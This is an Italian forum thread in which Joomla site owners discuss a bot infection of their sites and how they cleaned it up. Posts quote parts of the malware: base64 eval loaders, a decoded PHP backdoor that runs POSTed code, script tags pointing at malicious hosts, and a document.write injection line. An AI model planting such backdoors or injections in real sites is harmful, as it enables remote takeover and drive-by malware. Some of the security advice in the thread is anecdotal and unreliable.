sito attaccato

[alexsupers]

da ieri sera il sito và benone, sono state cambiate le pass. del db
se domani ancora và bene cerco di rimmettere sù anche l'altro
Unico problema è il caricamento delle immagini che è impossibile , ma mi sembra che è capitato anche ad altri, spero che l'assistenza riesca a risolvere il problema

[56francesco]

ma mi sembra che è capitato anche ad altri, spero che l'assistenza riesca a risolvere il problema

insisti con l'assistenza le immagini devono essere salvate perchè  joomla è il cms più diffuso al mondo  mica un bau bau micio micio!

[dd_77]

vecchia stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/configuration.php(1) : eval()'d code on line 1

Nuova stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/libraries/joomla/config.php(1) : eval()'d code on line 1

Ho notato che all'inizio del configuration .php c'è una striga lunghissima preceduta da
<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnV ecc. ecc.

che roba è?

queste modifiche vengono apportate da bot che fanno parte di una grande botnet con alle spalle dei bei package già configurati per setacciare la rete, violare il sito e modificare.

in quel codice c'è il comando iframe per scaricare in mkodo del tutto silente malware da un server di questa banda di criminali, può essere al 100% che sia solo un server mirrror quindi non il reale che fa da repository.

quando applicano queste modifiche di solito modificano tutti i file acsii presenti nel tuo dominio e noterai che è stato fatto tutto in un ristretto margine temporale quindi solamente da un bot..

avevo avuto un problema simile su un hosting gratuito che poi ha chiuso i servizi ma la piattaforma che usavo era wordpress.

[56francesco]

in quel codice c'è il comando iframe per scaricare in mkodo del tutto silente malware da un server di questa banda di criminali, può essere al 100% che sia solo un server mirrror quindi non il reale che fa da repository

detta in modo semplice:
accedono al sito passando dalle "porte" aperte ai servizi esterni,  capita quando riescono a dirottare le richieste a quei servizi alle loro pagine..
dopo ogni attacco i servizi esterni aggiornano le loro protezioni e si sta tranquilli fino alla prossima volta.
Un sito che non ha installati contatori e altre cose simile è esente da quel pericolo.. fatto sta che chiunque ha segnalato questo tipo di attacco aveva installato uno di quei cosi.
 

[alexsupers]

ora il sito và , unico problema quello già segnalato in altro post.Contatori non ci sono, pensi che si possa rimettere sù anche l'altro ?

è stato aggiunto su tutti i file acsii un codice lunghissimo.

Ho rimesso su il backup precedente e ora sembra che va, penso che siano passati dal forum,

Per contatori intendi anche Il chi è online di joomla ?

[alexsupers]

pensi che sia stato corrotto il db ?

[56francesco]

pensi che sia stato corrotto il db ?

basta verificare.. esportalo e poi leggilo con un qualsiasi notepad++ o programma simile..

[alexsupers]

ecco lo script che mi hanno attaccato

src=http://omochacha.com/images/rank5.php

[opthnet]

Mi aggiungo alla discussione perchè anche il mio sito è stato attaccato. In pratica è un bot che aggiunge nei file php un codice a del tipo

Codice: [Seleziona]

<?php eval(base64_decode( 'aWYoIWlzc2V0KCR... '. Tale codice tradotto diviene

Codice: [Seleziona]

if(!isset($s7n1)) {function s7n($s){if(preg_match_all('##is',$s,$a)) foreach($a[0] as $v) if(count(explode("\n",$v))>5) CONTINUA Che al suo interno ha un altra chiamata a base64_decode(). Il cui risultato è

Codice: [Seleziona]

<script src=http://sampoong.co.kr/admin/SMALL_UPDIR/index.php ></script>
Tale script poi viene incluso in tutti (o quasi) gli index.html nelle varie cartelle di Joomla. Ho appurato che il link dello script varia per ogni attacco. Ho rimesso su il sito già 4 volte(era già aggiornato all'ultima versione, la 1.5.14), cambiato password (sia del db che dell'administrator), tolto plugin recenti e contatori, sistemato i permessi su cartelle e files, ma il risultato è sempre lo stesso: sito corrotto dopo poche ore.
Inoltre nelle cartelle che contengono foto è presente un file php denominato gifimg.php il cui contenuto è

Codice: [Seleziona]

<?php  eval(base64_decode('aWYoIWlzc2V0KCR... CODICE'));?>
[code]che tradotto diviene: if(isset($_POST['e'])) eval(base64_decode($_POST['e'])); else die('404 Not Found');
Questo magari dice qualcosa in più sul tipo di attacco...
Facendo un pò di ricerche ho trovato che un risultato simile lo causava un malworm chiamato c99MadShell. Ma nulla che possa risolvere il mio problema.

[56francesco]

opthnet se proprio devi  (ma perchè poi?) contribuire alla diffusione di quella monnezza per cortesia almeno inseriscila nelle tag appropriate, grazie.

 

[56francesco]

Tale script poi viene incluso in tutti (o quasi) gli index.html

o index.php che sia..

questo è un comportamento tipico degli spammers che utilizzano la loro monnezza per far salire le proprie discariche nei motori di ricerca..

utilizzano le porte spalancate dei servizi esterni per entrare nel sito, ad esempio i contatori esterni o i servizi meteo..
avitare questi servizi è già una buona precauzione..

altra ottima precauzione è modificare subito tutte le credenziali di accesso, anche quelle del sito e del superadmin ma non solo quelle, anche e soprattutto quelle del databse e dell'ftp..

sposto qui oramai siamo fuori posto.

[alexsupers]

La mia situazione al momento è questa:
Ho rimesso sù anche l'altro sito con all'interno il forum , sono passate più di 24 ore e sembra che vada tutto OK
Se non hai un backup pulito non riesi a risolvere perchè vengono attaccate molte cartelle e molti file php hanno presente quel codice che si riproduce in poco tempo e ti mette Ko il sito.
Io ho fatto cosi:
ho cambiato tutte le pass, comprese quella del Database
Ho bloccato sull' Hosting il sito in modo che non si possa scrivere nelle cartelle  dopo che ho fatto il trasferimento del Backup completo, ho lanciato il sito e ancora presentava lo script ( dove si è infettato non sò ) ho controllato il configuration.php ma risultava pulito , ho poi aperto i file che risultavano modificati nella data ( se guardi bene hanno quasi tutti una data , alcuni però risultano modificati con una data più recente ) dentro questi file php c'era il codice malevolo che ho cancellato ( da me grazie al Backup erano solo 4/5 file corrotti ) Ora il sito và ma tengo il sito chiuso sullo spazio Hosting in modo che non si possano scrivere i file.
Vediamo che succede

[opthnet]

opthnet se proprio devi  (ma perchè poi?) contribuire alla diffusione di quella monnezza per cortesia almeno inseriscila nelle tag appropriate, grazie.

Semplicemente perchè se qualcuno ha questo problema, usando il motore di ricerca possa trovare questa discussione. Quindi, con l'aiuto di più persone, risolvere il problema...

x alexsupers. Cosa intendi ho bloccato sull' hosting il sito?
x56francesco. negli index.html inserisce lo script, mentre in quelli php del codice. Ma non solo. Modifica anche i files con estensione .js aggiungendo la seguente ultima riga:

Codice: [Seleziona]

document.write('<script src= LINK.php ><\/script>');
Ripeto che ho modificato le credenziali d'accesso e che ho rimosso i contatori, nonchè pulito tutti i files infetti ripristinando da un backup. Quindi al massimo è un plugin con qualche bug o un attacco dal servizio di hosting. Io uso ******.

[alexsupers]

sul mio hosting c'è la funzione di bloccare la scrittura delle cartelle , naturalmente qaulcuna deve rimanere libera se nò il sito non funziona
Ti confermo che il sito mi funziona da ieri abbastanza bene

[opthnet]

Penso di aver risolto. Il problema quasi sicuramente era la password ftp. Una volta modificata, non ho più subito attacchi. La cosa strana è che, se veramente avevano la mia password, perchè hanno fatto un simile attacco? Il mio sospetto è che dipenda dal servizio di hosting, perchè pensandoci avevo avuto già problemi (anche se differenti da questo).

[56francesco]

x56francesco. negli index.html inserisce lo script, mentre in quelli php del codice.

ovvio,

Il problema quasi sicuramente era la password ftp. Una volta modificata, non ho più subito attacchi

basta cambiarla spesso, è una ottima norma di sicurezza,

è comunque un comportamento tipico degli spammers che utilizzano le porte aperte nei siti per utilizzare programmi esterni come contatori e simili..
anche non utilizzare questi servizi è una ottima regola di sicurezza nota a tutto il web da quasi un decennio..
qualcuno dice che molti di quei servizi sono (o almeno erano perchè sono info che conosco da tanto tempo) essi stessi spammers, e del resto perchè escluderlo? visto che la lotta per salire nei motori di ricerca non esclude alcun colpo proibito (quando qualcuno paga ovviamente)

[lasvegas1991]

vi racconto in breve
tutto incomincia con un plugin chiamato jfirewall=joomla firewall che lo trovi su scriptmafia kuando te installi il plugin lui si installa ma se te lo attivi lui ti da direct access is allowed e nn c'e nnt che puoi fare infatti gli hacker del sito della gelmini del sito della postepay italia oppure quelli che sono entrati nellla email della presidentessa
Sara Palin ecc sono esperti in materia perchè un parte di siti come la securealive.net ed simili devono far pagare il loro plugin sulla sicurezza joomla sicurezza del server sicurezza del codice php html css ecc cioe io vedo php code protection se paga tot dollari Joomla Secure 197dollari per citarvi alcuni plugin perchè sto mondo di protezione deve essere a pagamento?

[Sottolerighe]

Scusa lasvegas, ma si capisce 1 parola si e 3 no di quello che hai scritto...

Visto che è un forum in italiano e non in qualche slang ti invito (da utente a utente) a usare un italiano più comprensibile.
Grazie

[coltivando-archivi]

HO RISOLTO, non era attacco ma manutenzione dell'hosting

Ciao a tutti

ho letto le 4 pagine del post quindi mi sono fatto quanto meno l'idea di come poi procedere nel caso si riveli un vero attacco e non un disservizio dell'hosting.

Dunque, io gestisco e curo due siti, www.coltivando-archivi.com e www.lahautecorniche.com. sul primo ho lavorato fino a ieri sera, ftp ok ma non lasciava modificare configuration.php dal pannello amministratore, (dovevo togliere gli url friendly) anche con dati FTP giusti. A parte quello avevo installato il modulo savira photogallery, funzionante.

Stamattina faccio un controllo e provo ad applicare una intuizione. al momento di salvare le impostazioni del modulo savira, il tutto si grippa, non carica più e dopo un poco mi esce unable to connect database mysql...

provando a ricaricare la pagina una volta su 3 mi si mostrava il sito poi da allora più nulla, non si collega. per giunta è sparito anche l'altro. per giunta l'hosting non mi risponde.

E' attacco o disservizio?

dispongo di backup manuali aggiornati, cambia solo il template ma quello non mi importa, è cosa veloce (magari il probleme è lì, il template è pjo-joomlaforall)

Per prevenire risposte già date ecco cosa farò:
1_provo a vedere se via ftp riesco a parlare ai database

2_se funzionano, in locale mi aggiorno i siti all'ultima versione (da 1.5.10_coltivando-archivi; da 1.5.12_lahautecorniche a 1.5.14) Basta sovrascrivere i file? esiste una guida wiki per l'aggionamento?

3_sono aperto a consigli.

Grazie, spero che non sia nulla...di grave.

[giumat79]

Anch'io ho lo stesso problema di opthnet: nonostante continui a cancellari gli script dai files, mi si ripresentano con link a siti diversi... non esiste soluzione? Probablmente c'è un file che danneggia sempre tutto. Fino a che non si elimina il problema persisterà.